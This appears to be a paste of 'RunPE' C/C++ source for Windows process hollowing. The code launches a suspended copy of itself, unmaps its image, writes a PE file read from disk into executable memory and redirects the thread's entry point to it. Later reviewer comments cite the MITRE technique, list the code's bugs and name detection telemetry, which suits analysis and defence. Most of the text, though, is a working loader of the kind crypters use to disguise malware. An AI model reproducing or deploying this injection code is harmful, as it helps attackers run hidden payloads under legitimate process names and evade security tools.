
RunPE

a guest
May 3rd, 2012
  1. #include <Windows.h>
  2.  
  // Function-pointer type matching the ntdll.dll export NtUnmapViewOfSection.
  // ExecFile resolves the export at run time with GetProcAddress, so the call
  // does not appear in this program's import table.
  3. typedef LONG (WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
  4.  
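  /**
   * Reads a whole file into a newly committed read/write buffer.
   *
   * @param szFileName  ANSI path of the file to read.
   * @return Buffer obtained from VirtualAlloc that holds the file contents, or
   *         NULL when the file cannot be opened, its size cannot be queried,
   *         it is empty, the allocation fails, or fewer bytes than the file
   *         size were read. The caller owns the buffer and must release it
   *         with VirtualFree(p, 0, MEM_RELEASE).
   *
   * The buffer length is not returned, so a consumer that parses the contents
   * has no way to bounds-check offsets taken from the file.
   */
  LPVOID FileToMem(LPCSTR szFileName)
  {
      HANDLE hFile;
      DWORD dwRead = 0;
      DWORD dwSize;
      LPVOID pBuffer = NULL;

      hFile = CreateFileA(szFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
      /* CreateFileA signals failure with INVALID_HANDLE_VALUE, never NULL. */
      if (hFile == INVALID_HANDLE_VALUE)
          return NULL;

      dwSize = GetFileSize(hFile, NULL);
      /* INVALID_FILE_SIZE is the error return; treat it like an empty file. */
      if (dwSize != INVALID_FILE_SIZE && dwSize > 0)
      {
          pBuffer = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
          if (pBuffer)
          {
              /* A freshly opened handle is already positioned at offset 0. */
              if (!ReadFile(hFile, pBuffer, dwSize, &dwRead, NULL) || dwRead != dwSize)
              {
                  /* Do not hand back a partially filled buffer. */
                  VirtualFree(pBuffer, 0, MEM_RELEASE);
                  pBuffer = NULL;
              }
          }
      }

      CloseHandle(hFile);
      return pBuffer;
  }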
  29.  
  /*
   * ExecFile: creates szFilePath as a suspended process and replaces its image
   * with the PE file held in memory at pFile, then resumes the main thread.
   * This is the "RunPE" / process-hollowing pattern (MITRE ATT&CK T1055.012).
   *
   * Parameters:
   *   szFilePath  path of the executable started as the host process.
   *   pFile       buffer holding a PE file; it is released with VirtualFree
   *               before returning, on every path, so the caller must not
   *               use it afterwards.
   *
   * Reviewer notes for analysts:
   *   - 32-bit only: pointers are truncated through DWORD casts, the remote
   *     reads/writes are 4 bytes wide, and the CONTEXT fields Ebx/Eax are used.
   *   - The buffer length is unknown here, so e_lfanew, NumberOfSections,
   *     PointerToRawData and SizeOfRawData are used without bounds checks.
   *   - Return values of ReadProcessMemory, WriteProcessMemory,
   *     SetThreadContext and ResumeThread are not checked.
   *   - PI.hProcess and PI.hThread are never closed, and no call terminates
   *     the child: any failure after CreateProcessA leaves a suspended
   *     process behind, which is itself a forensic artifact.
   *   - Detection: a child created with CREATE_SUSPENDED that then receives
   *     NtUnmapViewOfSection, VirtualAllocEx(PAGE_EXECUTE_READWRITE),
   *     WriteProcessMemory, SetThreadContext and ResumeThread from its parent
   *     is the sequence endpoint telemetry keys on; in memory the region at
   *     the image base no longer matches the file on disk.
   */
  30. void ExecFile(LPSTR szFilePath, LPVOID pFile)
  31. {
  32. PIMAGE_DOS_HEADER IDH;
  33. PIMAGE_NT_HEADERS INH;
  34. PIMAGE_SECTION_HEADER ISH;
  35. PROCESS_INFORMATION PI;
  36. STARTUPINFOA SI;
  37. PCONTEXT CTX;
  38. PDWORD dwImageBase;
  39. NtUnmapViewOfSection xNtUnmapViewOfSection;
  40. LPVOID pImageBase;
  41. int Count;
  42.  
  // Check the "MZ" and "PE\0\0" signatures of the in-memory file before doing anything else.
  43. IDH = PIMAGE_DOS_HEADER(pFile);
  44. if (IDH->e_magic == IMAGE_DOS_SIGNATURE)
  45. {
  46. INH = PIMAGE_NT_HEADERS(DWORD(pFile) + IDH->e_lfanew);
  47. if (INH->Signature == IMAGE_NT_SIGNATURE)
  48. {
  49. RtlZeroMemory(&SI, sizeof(SI));
  50. RtlZeroMemory(&PI, sizeof(PI));
  51.  
  // Start the host executable with its main thread suspended.
  52. if (CreateProcessA(szFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
  53. {
  // NOTE(review): sizeof(CTX) is the size of a pointer (CTX is a PCONTEXT), and
  // the allocation result is not checked before the write on the next line.
  54. CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
  55. CTX->ContextFlags = CONTEXT_FULL;
  56. if (GetThreadContext(PI.hThread, LPCONTEXT(CTX)))
  57. {
  // Read 4 bytes from the child at Ebx + 8. For a newly created suspended x86
  // process Ebx holds the PEB address, and PEB + 8 is ImageBaseAddress.
  58. ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&dwImageBase), 4, NULL);
  59.  
  // Only when the host is mapped at the new image's preferred base is the
  // host image unmapped; the export is resolved from ntdll.dll at run time.
  60. if (DWORD(dwImageBase) == INH->OptionalHeader.ImageBase)
  61. {
  62. xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
  63. xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase));
  64. }
  65.  
  // Allocate SizeOfImage bytes in the child at the preferred ImageBase.
  // 0x3000 is MEM_COMMIT | MEM_RESERVE; the whole region is read/write/execute.
  66. pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(INH->OptionalHeader.ImageBase), INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
  67. if (pImageBase)
  68. {
  // Copy the PE headers, then each section's raw data to its VirtualAddress.
  69. WriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHeaders, NULL);
  70. for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++)
  71. {
  // 248 is sizeof(IMAGE_NT_HEADERS32) and 40 is sizeof(IMAGE_SECTION_HEADER);
  // the section table is assumed to follow a standard-size optional header.
  72. ISH = PIMAGE_SECTION_HEADER(DWORD(pFile) + IDH->e_lfanew + 248 + (Count * 40));
  73. WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + ISH->VirtualAddress), LPVOID(DWORD(pFile) + ISH->PointerToRawData), ISH->SizeOfRawData, NULL);
  74. }
  // Store the new image base at the same Ebx + 8 location read earlier, point
  // Eax at the new image's entry point, apply the context and resume the thread.
  75. WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&INH->OptionalHeader.ImageBase), 4, NULL);
  76. CTX->Eax = DWORD(pImageBase) + INH->OptionalHeader.AddressOfEntryPoint;
  77. SetThreadContext(PI.hThread, LPCONTEXT(CTX));
  78. ResumeThread(PI.hThread);
  79. }
  80. }
  81. }
  82. }
  83. }
  // Runs on every path, including signature failures: the caller's buffer is gone after this call.
  84. VirtualFree(pFile, 0, MEM_RELEASE);
  85. }
  86.  
  /**
   * Entry point. Loads the hard-coded file C:\2.exe into memory and passes it,
   * together with the path of this program's own executable, to ExecFile().
   * The host process that ExecFile starts is therefore a second instance of
   * this same binary.
   *
   * NOTE(review): the path buffer is declared TCHAR but is filled and consumed
   * through the ANSI API by way of LPSTR casts.
   *
   * @return Always 0, whether or not the file could be loaded.
   */
  int main()
  {
      TCHAR selfPath[1024];
      LPVOID image = FileToMem("C:\\2.exe");

      /* Nothing to do when the file could not be read. */
      if (!image)
          return 0;

      /* Path of the running module; its return value is not inspected. */
      GetModuleFileNameA(NULL, (LPSTR)selfPath, 1024);
      ExecFile((LPSTR)selfPath, image);
      return 0;
  }